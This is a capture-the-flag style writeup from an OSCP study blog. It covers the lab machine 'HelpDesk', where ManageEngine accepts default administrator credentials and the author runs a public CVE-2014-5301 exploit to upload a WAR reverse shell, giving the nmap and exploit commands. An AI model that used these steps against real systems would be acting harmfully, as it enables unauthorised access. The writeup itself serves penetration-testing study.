Braindump
Read BlogpostsLet's Connect
  • Introduction: My OSCP Journey
  • Writeup Index
  • OSCP Machine Writeups
    • 🔥PG - Practice
      • Shenzi
      • DVR4
      • Resourced
      • Kevin
      • Nara
      • Jacko
      • Authby
      • Access
      • Internal
      • Hutch
      • Algernon
      • HelpDesk
      • Squid
      • Hepet
      • Craft2
      • ClamAV
      • Pelican
      • Payday
      • Snookums
      • Bratarina
      • Nibbles
      • Hetemit
      • Hawat
      • Astronaut
      • Exfiltrated
      • Fanatastic
      • Wombo
      • Levram
      • LaVita
    • 💣HackTheBox
      • Devel
      • Legacy
      • Intelligence
        • Learning
      • Blackfield
        • PrivEsc - SeBackupPrivilege
      • Sauna
      • Bastard
      • Arctic
      • Forest
      • Active
      • SecNotes
      • Access
  • Preparation Notes
    • Tips and Tricks
      • File Transfer
      • Download a file - Windows CLI
      • Bypassing Firewall/Defender/UAC
      • Accessing File
      • Reverse Shell
      • OneLiner - Reverse/bind Shell
      • OneLiner - MSFVenom
    • Enumeration Techniques
      • System and Network Enumeration
      • Web Enumeration
      • Service Enum
      • CMS
    • Exploitation
      • Exploiting Web Apps
      • Exploiting Wordpress
      • Public Exploits
    • Privilege Escalation
      • Linux Privilege Escalation
        • Disk Group PrivEsc
      • Windows Privilege Escalation
    • Active Directory
      • Enumeration
      • AD Attacks
      • mimikatz
      • Lateral movement
    • Pivoting and Networking
      • SSH Port Forwarding
      • Ligolo-ng
    • Password Cracking
Powered by GitBook
On this page
  • Summary
  • 🧵Let's Unpack
  • Enumeration
  • Initial Foothold

Was this helpful?

  1. OSCP Machine Writeups
  2. PG - Practice

HelpDesk

Root Access via CVE-2014-5301 and Default Admin Credentials

Summary

  • The machine was running a vulnerable version of ManageEngine, which was misconfigured to allow Admin login with the default password.

  • Later, I discovered a public authenticated exploit to gain a shell on the box.

🧵Let's Unpack

Enumeration

nmap -sC -sN -A -oN nmapFull -p- -A 192.168.166.43

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1

Enumerating port 8080 that is hosting ManageEngine Service

Misconfiguration found: Manage engine has enabled login using default credentials

administrator: administrator

Initial Foothold

We can use the following exploit to gain a shell on the box. Since it is an authenticated exploit, it requires a username and password, which we already have for this service.

# executing exploit to get reverse shell
python3 exploit.py 192.168.166.43 8080 administrator administrator shell.war 

> I actually got admin shell!!!

PreviousAlgernonNextSquid

Last updated 1 month ago

Was this helpful?

🔥
exploits/CVE-2014-5301.py at master · PeterSufliarsky/exploitsGitHub
Logo